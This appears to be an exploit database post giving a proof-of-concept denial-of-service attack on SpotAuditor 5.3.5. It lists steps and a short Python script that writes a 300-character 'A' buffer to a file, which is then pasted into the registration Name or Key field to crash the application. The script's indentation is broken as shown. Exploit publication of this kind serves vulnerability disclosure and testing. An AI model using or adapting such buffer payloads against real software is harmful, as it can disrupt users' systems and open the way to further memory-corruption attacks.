SpotAuditor 5.3.5 Denial Of Service

SpotAuditor version 5.3.5 suffers from a denial of service vulnerability.


MD5 | 6af369cf6cb1d22462a83724fe72b540

# Exploit Title: SpotAuditor 5.3.5  - 'multiple' Denial Of Service (PoC)
# Exploit Author : Sinem Şahin
# Exploit Date: 2021-02-10
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
# Tested on: Windows 7 x64
# Version: 5.3.5


# Steps:
1- Run the python script. (exploit.py)
2- Open payload.txt and copy content to clipboard.
3- Run 'SpotAuditor 5.3.5'.
4- Register -> Enter Registration Code
5- Paste clipboard into the "Name" or "Key".
6- Click on OK.
7- Crashed.

---> exploit.py <--

#!/usr/bin/env python
buffer = "\x41" * 300

try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print"File okey!!"
except:
print "File is not created."


Related Posts